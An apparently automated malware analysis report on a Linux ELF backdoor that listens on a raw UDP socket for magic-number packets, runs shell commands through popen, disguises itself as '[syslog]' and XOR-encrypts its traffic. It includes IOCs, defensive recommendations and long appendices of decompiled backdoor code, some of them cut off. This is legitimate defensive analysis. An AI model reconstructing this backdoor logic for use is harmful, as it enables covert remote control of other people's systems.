======================================================================
GHIDRA + RADARE2 BINARY ANALYSIS REPORT
======================================================================

SHA-256: 827f41fc1a6f8a4c8a8575b3e2349aeaba0dfc2c9390ef1cceeef1bb85c34161
Generated: 2026-02-10 09:10:07 UTC

----------------------------------------------------------------------
GHIDRA BINARY INFO
----------------------------------------------------------------------
Architecture: x86
Image Base:   00400000
Entry Points: 00601dc8, 004017a0, 00400aa0, 00401878, 00401216, 00401888, 0040163e, 00401890, 00601b38, 004017b0, 00601dd0, 004015ce, 00601dd4, 00601de8, 004010ce, 00601df8, 0040155e, 00601df0, 004016b8, 00400b78, 004008d0
Compiler:     ghidra.program.database.ProgramCompilerSpec@6f12fca0
Imports:      <EXTERNAL>::__sysv_signal, <EXTERNAL>::printf, <EXTERNAL>::memset, <EXTERNAL>::puts, <EXTERNAL>::fseek, <EXTERNAL>::htons, <EXTERNAL>::exit, <EXTERNAL>::fopen, <EXTERNAL>::__libc_start_main, <EXTERNAL>::recv, <EXTERNAL>::setsockopt, <EXTERNAL>::pclose, <EXTERNAL>::sprintf, <EXTERNAL>::ntohs, <EXTERNAL>::fgetc, <EXTERNAL>::strerror, <EXTERNAL>::memcpy, <EXTERNAL>::socket, <EXTERNAL>::__errno_location, <EXTERNAL>::strcpy, <EXTERNAL>::fclose, <EXTERNAL>::fork, <EXTERNAL>::sendto, <EXTERNAL>::fwrite, <EXTERNAL>::perror, <EXTERNAL>::popen, <EXTERNAL>::__gmon_start__
Exports:      data_start, __libc_csu_fini, _start, _fini, sendResult2Peer, _IO_stdin_used, checksum, __dso_handle, __DTOR_END__, __libc_csu_init, initPz, myDecryptFun, __bss_start, file, remoteExec, _end, myEncryptFun, filesize, udp_tcp_checksum, main, _init
Functions:    70 (12 decompiled)

----------------------------------------------------------------------
RADARE2 BINARY INFO
----------------------------------------------------------------------
Architecture: x86
Bits:         64
OS:           linux
Endian:       little
Stripped:     False
Imports:      __sysv_signal, printf, memset, __gmon_start__, puts, fseek, htons, exit, fopen, __libc_start_main, recv, setsockopt, pclose, sprintf, ntohs, fgetc, strerror, memcpy, socket, __errno_location, strcpy, fclose, fork, sendto, fwrite, perror, popen
Exports:      __libc_csu_fini, _start, _fini, sendResult2Peer, _IO_stdin_used, __data_start, checksum, __dso_handle, __DTOR_END__, __libc_csu_init, initPz, myDecryptFun, __bss_start, file, remoteExec, _end, myEncryptFun, filesize, _edata, udp_tcp_checksum, main, _init
Functions:    42 (11 decompiled)

----------------------------------------------------------------------
EXECUTIVE SUMMARY
----------------------------------------------------------------------
### 1. Executive Summary
The analyzed binary is a Linux backdoor (ELF 64-bit) that utilizes a Raw UDP socket to establish a covert command and control (C2) channel. Upon execution, it attempts to mask its identity by setting the process name to `[syslog]` and requires root privileges to create a raw socket. The malware listens for packets containing a specific magic number (`0x84b`) to authenticate incoming commands. Its capabilities include remote shell command execution via `popen` and writing arbitrary data to a local file named `system.conf`. Communication is obfuscated using a custom XOR encryption routine. The presence of raw socket manipulation and process masquerading indicates a threat designed for persistence and stealth on Linux systems.

### 2. Malware Capabilities
- **Raw Socket Communication**: Creates a socket `AF_INET, SOCK_RAW, IPPROTO_UDP` to sniff/intercept network traffic, bypassing standard OS port filtering.
- **Process Masquerading**: Modifies `argv[0]` to `[syslog]` to blend in with legitimate system processes.
- **Remote Command Execution**: Executes arbitrary shell commands received from the C2 server using `popen` and returns the output.
- **File Manipulation**: Capability to write received file data to disk (`system.conf`).
- **XOR Encryption**: Uses a simple 4-byte XOR key (`idkey`) to encrypt outgoing traffic and decrypt incoming traffic.
- **Packet Manipulation**: Manually constructs UDP/IP packets, including checksum calculation (`udp_tcp_checksum`) and source/destination address swapping to send replies back to the attacker.

### 3. Binary Information
| Property | Value |
|----------|-------|
| SHA256 | 827f41fc1a6f8a4c8a8575b3e2349aeaba0dfc2c9390ef1cceeef1bb85c34161 |
| Architecture | x86_64 |
| Type | ELF |
| Image Base | 0x00400000 |
| Entry Point | 0x004017b0 (_start) |
| Compiler | GCC (GNU) 4.1.2 20080704 (Red Hat 4.1.2-55) |
| Size | Unknown |
| Packing | Unpacked |

### 4. Technical Analysis

**Process Masquerading & Initialization**
The `main` function begins by checking the argument count. If sufficient arguments exist, it overwrites `argv[0]` with the string `[syslog]` (hex `7379735b`, `64676f6c`, `5d`). This is a standard technique to hide the malicious process in a process list.

**Network Setup**
The malware calls `__sysv_signal` to handle signals, followed by `socket(2, 3, 0x11)` (AF_INET, SOCK_RAW, IPPROTO_UDP). This requires root privileges. It sets a socket option via `setsockopt` (likely `SO_BROADCAST` or similar based on the argument).

**Command Processing Loop**
The binary enters a loop calling `recv` on the raw socket. It waits for a packet where a specific field (converted via `ntohs`) equals `0x84b`. This acts as the authentication magic number. It then checks a command type byte:
- If the command type is `0x02`, it opens `system.conf` and appends data to it.
- For other types (implied execution flow), it forks a child process. The child process calls `remoteExec` to run the command, then `sendResult2Peer` to send the output back.

**C2 Communication**
`sendResult2Peer` constructs a response packet. It swaps the source and destination IP/ports from the received packet to route the reply correctly. It encrypts the payload using `myEncryptFun` and calculates the UDP checksum manually before sending via `sendto`.

```c
// Snippet from main showing process name spoofing and magic number check
puVar2 = (undefined4 *)*param_2;
*puVar2 = 0x7379735b; // "[sys"
puVar2[1] = 0x64676f6c; // "log]"
*(undefined2 *)(puVar2 + 2) = 0x5d;
// ...
uVar3 = ntohs(local_832);
} while (uVar3 != 0x84b); // Magic number check
```

### 5. Functions Analysis

**main @ 0x00400b78 (0 xrefs from listed, but is entry point)**
- **Purpose**: Main control loop for the malware. Handles process name spoofing, socket creation, and command dispatching.
- **Key Code**: `socket(2, 3, 0x11)`, `ntohs(local_832) != 0x84b`, `fork()`.
- **Security Note**: The use of raw sockets allows the malware to bypass firewall rules that typically filter based on ports and inspect traffic before it reaches the standard network stack.

**remoteExec @ 0x004010ce**
- **Purpose**: Executes a shell command received from the network and captures the output.
- **Key Code**: `popen(param_1,"r")`, loop reading via `fgetc`.
- **Security Note**: Allows arbitrary code execution (ACE) on the infected host. The error message "server error: '%s' cannt execute" confirms intent to execute commands.

**sendResult2Peer @ 0x00401216**
- **Purpose**: Encrypts and transmits the result of the command execution back to the controller.
- **Key Code**: Swaps IP/Port headers, calls `myEncryptFun`, `udp_tcp_checksum`, `sendto`.
- **Security Note**: Manually constructing packets (Raw Socket) is indicative of sophisticated malware attempting to evade IDS/IPS that might inspect standard API calls.

**myEncryptFun @ 0x0040163e (Approx, from export list)**
- **Purpose**: Performs XOR encryption on the data payload.
- **Key Code**: `*(byte *)(local_c + param_5) = *(byte *)(local_c + param_3) ^ *(byte *)((ulong)local_d + param_1);`.
- **Security Note**: Simple XOR encryption is weak and easily reversed, but sufficient to bypass simple string-based detection mechanisms.

**udp_tcp_checksum @ 0x004016b8**
- **Purpose**: Calculates the standard internet checksum for the UDP packet to ensure network validity.
- **Key Code**: Pseudo-header construction + `checksum()` call.

### 6. Operational Flow
1.  **Initialization**: The binary starts, checks arguments, and overwrites `argv[0]` with `[syslog]`.
2.  **Setup**: Establishes a Raw UDP socket (`socket()`, `setsockopt()`).
3.  **Main Operation**: Enters an infinite loop to `recv` data.
    *   Checks if the received packet contains the magic number `0x84b`.
    *   Validates the packet type (offset `iVar4 + 1`).
    *   If type is `0x02`: Writes payload to `system.conf`.
    *   Otherwise (Execution): Forks the process. The child process executes the command via `remoteExec`.
4.  **Persistence**: The process runs as a daemon (implied by the loop and signal handling), maintaining the raw socket connection to listen for further commands. It relies on the attacker to restart it if the host reboots (no auto-start mechanism explicitly found in the provided code).

### 7. C2 & Networking
-   **C2 Servers**: None hardcoded; the malware responds to the source IP of the received packet (passive backdoor).
-   **Protocols**: Raw UDP (IP Protocol 17).
-   **Communication Pattern**:
    -   **Inbound**: Malware sniffs for UDP packets with magic header `0x84b`.
    -   **Outbound**: Malware crafts a new UDP packet, swapping Source/Dest IPs and Ports from the received packet, encrypts the payload (XOR), calculates checksums, and sends it.

### 8. Evidence of Malicious Activity
1.  **Finding**: Process Masquerading - Evidence: `[syslog]` string (hex `7379735b...`) at `0x00400b78`.
2.  **Finding**: Raw Socket Creation - Evidence: `socket(2, 3, 0x11)` call at `0x00400b78` (AF_INET, SOCK_RAW, IPPROTO_UDP).
3.  **Finding**: Remote Code Execution - Evidence: `popen` call in `remoteExec` at `0x004010ce`.
4.  **Finding**: File Write Capability - Evidence: String `"system.conf"` and `fopen("system.conf","w+")` at `0x00400b78`.

### 9. Recommendations
1.  **Network Monitoring**: Implement anomaly detection for raw socket usage on endpoints, as this is rarely used by legitimate applications.
2.  **Process Monitoring**: Monitor for processes named `[syslog]` or other common service names that are spawning from unexpected locations or user contexts.
3.  **File Integrity**: Monitor for the creation of `system.conf` in root directories or unusual locations.
4.  **Signature Detection**: Create signatures for the magic packet value `0x84b` in raw UDP headers to identify infection traffic.

### 10. IOCs (Indicators of Compromise)
-   **Filename**: `system.conf` - Used for storing data received from C2.
-   **Process Name**: `[syslog]` - Used to masquerade the running malware.
-   **Network Magic**: `0x84b` (2123) - Specific value used in UDP packets to trigger command execution.
-   **String**: `"server error: '%s' cannt execute"` - Unique error string found in the binary.

### 11. Conclusion
The binary is a sophisticated Linux backdoor utilizing raw sockets for covert communication and arbitrary command execution. Its use of process masquerading and packet manipulation suggests a focus on evasion and persistence. Immediate action is required to scan systems for the specific IOCs and block raw socket usage where not strictly necessary.

----------------------------------------------------------------------
CALL GRAPH & ATTACK CHAINS
----------------------------------------------------------------------
Ghidra: nodes=17, edges=12, entries=12
  Entry points: __libc_csu_fini, __libc_csu_init, _fini, _init, _start, checksum, main, myDecryptFun, myEncryptFun, remoteExec
  Attack chains:
    - [Crypto] main -> myDecryptFun
    - [Crypto] sendResult2Peer -> myEncryptFun
    - [Network] main -> sendResult2Peer
    - [Crypto] main -> sendResult2Peer -> myEncryptFun

Radare2: nodes=42, edges=0, entries=2
  Entry points: entry0, main
  Attack chains: none detected

----------------------------------------------------------------------
APPENDIX A: GHIDRA DECOMPILED FUNCTIONS (12)
----------------------------------------------------------------------

--- FUN_004008e8 ---

void FUN_004008e8(void)

{
  (*(code *)PTR_00601cf0)();
  return;
}



--- main ---

void main(undefined8 param_1,undefined8 *param_2)

{
  char cVar1;
  undefined4 *puVar2;
  uint16_t uVar3;
  int iVar4;
  __pid_t _Var5;
  int *piVar6;
  char *pcVar7;
  ssize_t sVar8;
  long lVar9;
  ulong uVar10;
  undefined1 *puVar11;
  char local_e38 [1512];
  uint local_850;
  undefined4 local_84c;
  char local_848 [5];
  uint uStack_843;
  byte bStack_83f;
  ushort auStack_83e [5];
  undefined1 auStack_834 [2];
  uint16_t local_832;
  int local_40;
  uint local_3c;
  char *local_38;
  int local_2c;
  undefined1 *local_28;
  char *local_20;
  char *local_18;
  undefined2 local_e;
  uint local_c;
  
  local_40 = 0xffffffff;
  memset(local_848,0,0x800);
  uVar10 = 0xffffffffffffffff;
  pcVar7 = (char *)*param_2;
  do {
    if (uVar10 == 0) break;
    uVar10 = uVar10 - 1;
    cVar1 = *pcVar7;
    pcVar7 = pcVar7 + 1;
  } while (cVar1 != '\0');
  if (8 < ~uVar10 - 1) {
    uVar10 = 0xffffffffffffffff;
    pcVar7 = (char *)*param_2;
    do {
      if (uVar10 == 0) break;
      uVar10 = uVar10 - 1;
      cVar1 = *pcVar7;
      pcVar7 = pcVar7 + 1;
    } while (cVar1 != '\0');
    uVar10 = ~uVar10;
    puVar11 = (undefined1 *)*param_2;
    while (uVar10 = uVar10 - 1, uVar10 != 0) {
      *puVar11 = 0;
      puVar11 = puVar11 + 1;
    }
    puVar2 = (undefined4 *)*param_2;
    *puVar2 = 0x7379735b;
    puVar2[1] = 0x64676f6c;
    *(undefined2 *)(puVar2 + 2) = 0x5d;
  }
  __sysv_signal(0x11,(__sighandler_t)0x1);
  local_40 = socket(2,3,0x11);
  if (local_40 == -1) {
    piVar6 = __errno_location();
    pcVar7 = strerror(*piVar6);
    printf("socket(): %s\n",pcVar7);
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_84c = 1;
  iVar4 = setsockopt(local_40,0,3,&local_84c,4);
  if (iVar4 < 0) {
    puts("setsockopt error!");
  }
LAB_00400cd7:
  do {
    while( true ) {
      do {
        do {
          do {
            memset(local_848,0,0x800);
            sVar8 = recv(local_40,local_848,0x800,0);
            local_3c = (uint)sVar8;
          } while ((int)local_3c < 1);
          local_38 = local_848;
          local_2c = 0x14;
          local_28 = auStack_834;
          uVar3 = ntohs(local_832);
        } while (uVar3 != 0x84b);
        iVar4 = local_2c + 8;
        local_20 = local_848 + iVar4;
        local_2c = local_2c + 0x14;
      } while (local_848[(long)iVar4 + 1] != '\x01');
      lVar9 = (long)local_2c;
      local_18 = local_848 + lVar9;
      local_850 = *(uint *)((long)&uStack_843 + lVar9);
      if (local_850 == idkey) break;
      printf("idkey not correct,%d!=%d\n",(ulong)local_850,(ulong)idkey);
    }
    printf("receive %d, cmd type is %d and cmdl is %d\n",(ulong)local_3c,(ulong)(&bStack_83f)[lVar9]
           ,(ulong)*(ushort *)((long)auStack_83e + lVar9));
    myDecryptFun(&idkey,4,local_18 + 0xc,*(undefined2 *)(local_18 + 10),local_18 + 0xc);
    if (local_18[9] != '\0') {
      if (local_18[9] == '\x01') {
        idkey = *(uint *)(local_18 + 0xc);
        pcVar7 = local_e38;
        for (lVa

--- sendResult2Peer ---

void sendResult2Peer(int param_1,undefined1 *param_2,ushort param_3,undefined8 param_4,
                    ushort param_5)

{
  uint16_t uVar1;
  undefined2 uVar2;
  long lVar3;
  ulong uVar4;
  undefined1 *puVar5;
  sockaddr local_638;
  undefined1 local_628 [2];
  undefined2 local_626 [5];
  undefined4 local_61c;
  undefined4 local_618;
  int local_44;
  undefined1 *local_40;
  undefined2 *local_30;
  undefined2 local_22;
  undefined1 *local_20;
  undefined1 *local_18;
  uint16_t local_a;
  
  memset(local_628,0,0x5dc);
  local_44 = 0;
  if (param_3 < 0x5dc) {
    puVar5 = local_628;
    for (uVar4 = (ulong)param_3; uVar4 != 0; uVar4 = uVar4 - 1) {
      *puVar5 = *param_2;
      param_2 = param_2 + 1;
      puVar5 = puVar5 + 1;
    }
  }
  else {
    memcpy(local_628,param_2,0x5dc);
  }
  local_40 = local_628;
  local_61c = local_618;
  lVar3 = (long)(local_44 + 0x14);
  local_30 = (undefined2 *)(local_628 + lVar3);
  local_44 = local_44 + 0x1c;
  local_22 = *(undefined2 *)(local_628 + lVar3 + 2);
  *(undefined2 *)(local_628 + lVar3 + 2) = *local_30;
  *local_30 = local_22;
  local_20 = local_628 + local_44;
  local_628[(long)local_44 + 1] = 2;
  local_44 = local_44 + 0xc;
  local_18 = local_628 + local_44;
  *(undefined2 *)(local_628 + (long)local_44 + 1) = 2;
  if (param_5 < 0x4b0) {
    myEncryptFun(&idkey,4,param_4,param_5,local_18 + 0xc);
    uVar1 = htons(param_5 + 0x20);
    local_30[2] = uVar1;
    *(ushort *)(local_18 + 10) = param_5;
  }
  else {
    myEncryptFun(&idkey,4,param_4,0x4b0,local_18 + 0xc);
    uVar1 = htons(0x4d0);
    local_30[2] = uVar1;
    *(undefined2 *)(local_18 + 10) = 0x4b0;
  }
  uVar1 = htons(*(short *)(local_18 + 10) + 0x10);
  *(uint16_t *)(local_20 + 2) = uVar1;
  *(short *)(local_18 + 1) = *(short *)(local_18 + 1) + *(short *)(local_18 + 10) + 7;
  uVar1 = htons(*(uint16_t *)(local_18 + 1));
  *(uint16_t *)(local_18 + 1) = uVar1;
  local_a = ntohs(local_30[2]);
  local_30[3] = 0;
  uVar2 = udp_tcp_checksum(0x11,*(undefined4 *)(local_40 + 0xc),*(undefined4 *)(local_40 + 0x10),
                           local_30,local_a);
  local_30[3] = uVar2;
  local_40[6] = local_40[6] | 0x40;
  uVar1 = htons(local_a + 0x14);
  *(uint16_t *)(local_40 + 2) = uVar1;
  *(undefined2 *)(local_40 + 10) = 0;
  uVar2 = checksum(local_628,local_a + 0x14);
  *(undefined2 *)(local_40 + 10) = uVar2;
  local_638.sa_data._2_4_ = *(undefined4 *)(local_40 + 0x10);
  local_638.sa_family = 2;
  local_638.sa_data._0_2_ = local_30[1];
  sendto(param_1,local_628,(ulong)local_a + 0x14,0,&local_638,0x10);
  return;
}



--- remoteExec ---

ushort remoteExec(char *param_1,char *param_2)

{
  char cVar1;
  int iVar2;
  char *pcVar3;
  FILE *pFVar4;
  ulong uVar5;
  long lVar6;
  ushort local_c;
  
  strcpy(param_2,param_1);
  uVar5 = 0xffffffffffffffff;
  pcVar3 = param_2;
  do {
    if (uVar5 == 0) break;
    uVar5 = uVar5 - 1;
    cVar1 = *pcVar3;
    pcVar3 = pcVar3 + 1;
  } while (cVar1 != '\0');
  pcVar3 = param_2 + (~uVar5 - 1);
  pcVar3[0] = '\n';
  pcVar3[1] = ' ';
  pcVar3[2] = '\0';
  lVar6 = -1;
  pcVar3 = param_2;
  do {
    if (lVar6 == 0) break;
    lVar6 = lVar6 + -1;
    cVar1 = *pcVar3;
    pcVar3 = pcVar3 + 1;
  } while (cVar1 != '\0');
  local_c = ~(ushort)lVar6 - 1;
  pFVar4 = popen(param_1,"r");
  pFVar4 = (FILE *)(long)(int)pFVar4;
  if (pFVar4 == (FILE *)0x0) {
    perror(param_1);
    pclose((FILE *)0x0);
    sprintf(param_2 + local_c,"server error: \'%s\' cannt execute\n",param_1);
    lVar6 = -1;
    do {
      if (lVar6 == 0) break;
      lVar6 = lVar6 + -1;
      cVar1 = *param_2;
      param_2 = param_2 + 1;
    } while (cVar1 != '\0');
    local_c = ~(ushort)lVar6 - 1;
  }
  else {
    for (; local_c < 0x4b0; local_c = local_c + 1) {
      iVar2 = fgetc(pFVar4);
      if ((char)iVar2 == -1) break;
      param_2[local_c] = (char)iVar2;
    }
    pclose(pFVar4);
  }
  return local_c;
}



--- udp_tcp_checksum ---

undefined2
udp_tcp_checksum(undefined1 param_1,undefined4 param_2,undefined4 param_3,undefined1 *param_4,
                uint16_t param_5)

{
  undefined2 uVar1;
  ulong uVar2;
  undefined4 *puVar3;
  undefined1 *puVar4;
  undefined1 local_608 [1504];
  undefined4 local_28;
  undefined4 local_24;
  undefined1 local_20;
  undefined1 local_1f;
  uint16_t local_1e;
  ushort local_e;
  int local_c;
  
  local_e = 0xc;
  local_20 = 0;
  local_28 = param_3;
  local_24 = param_2;
  local_1f = param_1;
  local_1e = htons(param_5);
  local_c = (uint)local_e + (uint)param_5;
  memset(local_608,0,0x5dc);
  puVar3 = &local_28;
  puVar4 = local_608;
  for (uVar2 = (ulong)local_e; uVar2 != 0; uVar2 = uVar2 - 1) {
    *puVar4 = *(undefined1 *)puVar3;
    puVar3 = (undefined4 *)((long)puVar3 + 1);
    puVar4 = puVar4 + 1;
  }
  puVar4 = local_608 + local_e;
  for (uVar2 = (ulong)param_5; uVar2 != 0; uVar2 = uVar2 - 1) {
    *puVar4 = *param_4;
    param_4 = param_4 + 1;
    puVar4 = puVar4 + 1;
  }
  uVar1 = checksum(local_608,local_c);
  return uVar1;
}



--- checksum ---

uint checksum(ushort *param_1,int param_2)

{
  long lVar1;
  int local_24;
  ushort *local_20;
  ulong local_10;
  
  local_10 = 0;
  local_20 = param_1;
  for (local_24 = param_2; 1 < local_24; local_24 = local_24 + -2) {
    local_10 = local_10 + *local_20;
    local_20 = local_20 + 1;
  }
  if (local_24 != 0) {
    local_10 = local_10 + (byte)*local_20;
  }
  lVar1 = (local_10 >> 0x10) + (local_10 & 0xffff);
  return ~((int)lVar1 + (int)((ulong)lVar1 >> 0x10)) & 0xffff;
}



--- myEncryptFun ---

ushort myEncryptFun(long param_1,byte param_2,long param_3,ushort param_4,long param_5)

{
  undefined1 local_d;
  undefined4 local_c;
  
  local_d = 0;
  for (local_c = 0; local_c < (int)(uint)param_4; local_c = local_c + 1) {
    if (param_2 <= local_d) {
      local_d = 0;
    }
    *(byte *)(local_c + param_5) =
         *(byte *)(local_c + param_3) ^ *(byte *)((ulong)local_d + param_1);
    local_d = local_d + 1;
  }
  return param_4;
}



--- myDecryptFun ---

ushort myDecryptFun(long param_1,byte param_2,long param_3,ushort param_4,long param_5)

{
  undefined1 local_d;
  undefined4 local_c;
  
  local_d = 0;
  for (local_c = 0; local_c < (int)(uint)param_4; local_c = local_c + 1) {
    if (param_2 <= local_d) {
      local_d = 0;
    }
    *(byte *)(local_c + param_5) =
         *(byte *)(local_c + param_3) ^ *(byte *)((ulong)local_d + param_1);
    local_d = local_d + 1;
  }
  return param_4;
}



--- __do_global_dtors_aux ---

/* WARNING: Removing unreachable block (ram,0x00400b21) */

void __do_global_dtors_aux(void)

{
  if (completed_6145 == '\0') {
    completed_6145 = '\x01';
  }
  return;
}



--- __do_global_ctors_aux ---

void __do_global_ctors_aux(void)

{
  code *pcVar1;
  undefined8 *puVar2;
  
  puVar2 = &__CTOR_LIST__;
  pcVar1 = __CTOR_LIST__;
  while (pcVar1 != (code *)0xffffffffffffffff) {
    puVar2 = puVar2 + -1;
    (*pcVar1)();
    pcVar1 = (code *)*puVar2;
  }
  return;
}



----------------------------------------------------------------------
APPENDIX B: RADARE2 DECOMPILED FUNCTIONS (11)
----------------------------------------------------------------------

--- main ---
/* r2dec pseudo code output (r2 6.0.8) */
/* /data/shared/dbus-echo @ 0x400b78 */
#include <stdint.h>
 
int32_t main (int32_t argc, char ** argv) {
    int64_t var_e60h;
    int64_t var_e58h;
    int64_t var_e50h;
    int64_t var_e48h;
    char ** var_e40h;
    int64_t var_e34h;
    char  s;
    int64_t var_848h;
    void  optval;
    void  buffer;
    uint32_t socket;
    ssize_t var_34h;
    int64_t var_30h;
    int64_t var_24h;
    int64_t var_20h;
    int64_t var_18h;
    void * ptr;
    int64_t var_6h;
    int64_t var_4h;
    rdi = argc;
    rsi = argv;
    *((rbp - 0xe34)) = edi;
    *((rbp - 0xe40)) = rsi;
    *((rbp - 0x38)) = 0xffffffff;
    memset (rbp - 0x840, 0, 0x800);
    rax = *((rbp - 0xe40));
    rax = *(rax);
    rcx = 0xffffffffffffffff;
    *((rbp - 0xe48)) = rax;
    eax = 0;
    rdi = *((rbp - 0xe48));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rax--;
    if (rax <= 8) {
        goto label_1;
    }
    rax = *((rbp - 0xe40));
    rax = *(rax);
    rcx = 0xffffffffffffffff;
    *((rbp - 0xe50)) = rax;
    eax = 0;
    rdi = *((rbp - 0xe50));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rdx = rax - 1;
    rax = *((rbp - 0xe40));
    rax = *(rax);
    rdi = *(rax);
    rcx = rdx;
    eax = 0;
    do {
        *(rdi) = al;
        rcx--;
        rdi++;
    } while (rcx != 0);
    rax = *((rbp - 0xe40));
    rax = *(rax);
    *(rax) = 0x7379735b;
    *((rax + 4)) = 0x64676f6c;
    *((rax + 8)) = 0x5d;
label_1:
    esi = 1;
    edi = 0x11;
    sysv_signal ();
    eax = socket (2, 3, 0x11);
    *((rbp - 0x38)) = eax;
    if (*((rbp - 0x38)) == 0xffffffff) {
        rax = errno_location ();
        rax = strerror (*(rax));
        rsi = rax;
        eax = 0;
        printf ("socket(): %s\n");
        exit (1);
    }
    *((rbp - 0x844)) = 1;
    eax = setsockopt (*((rbp - 0x38)), 0, 3, rbp - 0x844, 4);
    if (eax >= 0) {
        goto label_0;
    }
    puts ("setsockopt error!");
    while (*((rbp - 0x34)) <= 0) {
label_0:
        rax = rbp - 0x840;
        memset (rax, 0, 0x800);
        ecx = 0;
        edx = 0x800;
        eax = recv (*((rbp - 0x38)), rbp - 0x840);
        *((rbp - 0x34)) = eax;
    }
    rax = rbp - 0x840;
    *((rbp - 0x30)) = rax;
    *((rbp - 0x24)) = 0x14;
    eax = *((rbp - 0x24));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x840;
    rax += rdx;
    *((rbp - 0x20)) = rax;
    rax = *((rbp - 0x20));
    eax = *((rax + 2));
    edi = (int32_t) ax;
    ax = ntohs ();
    if (ax != 0x84b) {
        goto label_0;
    }
    eax = *((rbp - 0x24));
    eax += 8;
    *((rbp - 0x24)) = eax;
    eax = *((rbp - 0x24));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x840;
    rax += rdx;
    *((rbp - 0x18)) = rax;
    eax = *((rbp - 0x24));
    eax += 0xc;
    *((rbp - 0x24)) = eax;
    rax = *((rbp - 0x18));
    eax = *((rax + 1));
    if (al != 1) {
        goto label_0;
    }
    eax = *((rbp - 0x24));
    rax = (int64_t) eax;


--- sym.sendResult2Peer ---
/* r2dec pseudo code output (r2 6.0.8) */
/* /data/shared/dbus-echo @ 0x401216 */
#include <stdint.h>
 
uint64_t sendResult2Peer (uint32_t arg1, size_t arg2, char  arg3, int64_t arg4) {
    uint32_t var_654h;
    char  var_650h;
    uint32_t var_644h;
    size_t s2;
    uint32_t var_634h;
    int64_t var_630h;
    int64_t var_62eh;
    int64_t var_62ch;
    void * s1;
    int64_t var_3ch;
    int64_t var_38h;
    int64_t var_2ch;
    int64_t var_28h;
    int64_t var_1ah;
    int64_t var_18h;
    int64_t var_10h;
    int64_t var_2h;
    rdi = arg1;
    rsi = arg2;
    rcx = arg3;
    r8 = arg4;
    *((rbp - 0x634)) = edi;
    *((rbp - 0x640)) = rsi;
    *((rbp - 0x650)) = rcx;
    eax = r8d;
    *((rbp - 0x644)) = dx;
    *((rbp - 0x654)) = ax;
    memset (rbp - 0x620, 0, 0x5dc);
    *((rbp - 0x3c)) = 0;
    if (*((rbp - 0x644)) > 0x5db) {
        goto label_0;
    }
    ecx = *((rbp - 0x644));
    rax = rbp - 0x620;
    rdx = *((rbp - 0x640));
    rdi = rax;
    rsi = rdx;
    do {
        *(rdi) = *(rsi);
        rcx--;
        rsi++;
        rdi++;
    } while (rcx != 0);
    goto label_1;
label_0:
    rax = rbp - 0x620;
    rdx = *((rbp - 0x640));
    memcpy (rax, rdx, 0x5dc);
label_1:
    rax = rbp - 0x620;
    *((rbp - 0x38)) = rax;
    rax = *((rbp - 0x38));
    eax = *((rax + 0xc));
    *((rbp - 0x2c)) = eax;
    rax = *((rbp - 0x38));
    edx = *((rax + 0x10));
    rax = *((rbp - 0x38));
    *((rax + 0xc)) = edx;
    rdx = *((rbp - 0x38));
    eax = *((rbp - 0x2c));
    *((rdx + 0x10)) = eax;
    eax = *((rbp - 0x3c));
    eax += 0x14;
    *((rbp - 0x3c)) = eax;
    eax = *((rbp - 0x3c));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x620;
    rax += rdx;
    *((rbp - 0x28)) = rax;
    eax = *((rbp - 0x3c));
    eax += 8;
    *((rbp - 0x3c)) = eax;
    rax = *((rbp - 0x28));
    eax = *((rax + 2));
    *((rbp - 0x1a)) = ax;
    rax = *((rbp - 0x28));
    edx = *(rax);
    rax = *((rbp - 0x28));
    *((rax + 2)) = dx;
    rdx = *((rbp - 0x28));
    eax = *((rbp - 0x1a));
    *(rdx) = ax;
    eax = *((rbp - 0x3c));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x620;
    rax += rdx;
    *((rbp - 0x18)) = rax;
    rax = *((rbp - 0x18));
    *((rax + 1)) = 2;
    eax = *((rbp - 0x3c));
    eax += 0xc;
    *((rbp - 0x3c)) = eax;
    eax = *((rbp - 0x3c));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x620;
    rax += rdx;
    *((rbp - 0x10)) = rax;
    rax = *((rbp - 0x10));
    *((rax + 1)) = 2;
    if (*((rbp - 0x654)) > 0x4af) {
        rax = *((rbp - 0x10));
        rax += 0xc;
        edi = obj.idkey;
        rdx = *((rbp - 0x650));
        r8 = rax;
        ecx = 0x4b0;
        esi = 4;
        myEncryptFun ();
        edi = 0x4d0;
        eax = htons ();
        edx = eax;
        rax = *((rbp - 0x28));
        *((rax + 4)) = dx;
        rax = *((rbp - 0x10));
        *((rax + 0xa)) = 0x4b0;
    } else {
        rax = *((rbp - 0x10));
        rax += 0xc;
        ecx = *((rbp - 0x654));
        edi = obj.i

--- sym.remoteExec ---
/* r2dec pseudo code output (r2 6.0.8) */
/* /data/shared/dbus-echo @ 0x4010ce */
#include <stdint.h>
 
int64_t remoteExec (char * arg1, char  arg2) {
    int64_t var_40h;
    char * var_38h;
    char * var_30h;
    uint32_t var_24h;
    char  dest;
    char * filename;
    file* stream;
    uint32_t var_4h;
    uint32_t var_1h;
    rdi = arg1;
    rsi = arg2;
    *((rbp - 0x18)) = rdi;
    *((rbp - 0x20)) = rsi;
    strcpy (*((rbp - 0x20)), *((rbp - 0x18)));
    rax = *((rbp - 0x20));
    rcx = 0xffffffffffffffff;
    *((rbp - 0x30)) = rax;
    eax = 0;
    rdi = *((rbp - 0x30));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rax--;
    rax += *((rbp - 0x20));
    *(rax) = 0x200a;
    *((rax + 2)) = 0;
    rax = *((rbp - 0x20));
    rcx = 0xffffffffffffffff;
    *((rbp - 0x38)) = rax;
    eax = 0;
    rdi = *((rbp - 0x38));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rax--;
    *((rbp - 4)) = ax;
    eax = 0;
    rax = popen (*((rbp - 0x18)), 0x40194d);
    rax = (int64_t) eax;
    *((rbp - 0x10)) = rax;
    if (*((rbp - 0x10)) != 0) {
        goto label_0;
    }
    perror (*((rbp - 0x18)));
    eax = 0;
    pclose (*((rbp - 0x10)));
    eax = *((rbp - 4));
    rdi += *((rbp - 0x20));
    eax = 0;
    sprintf (rax, "server error: '%s' cannt execute\n", *((rbp - 0x18)));
    rax = *((rbp - 0x20));
    rcx = 0xffffffffffffffff;
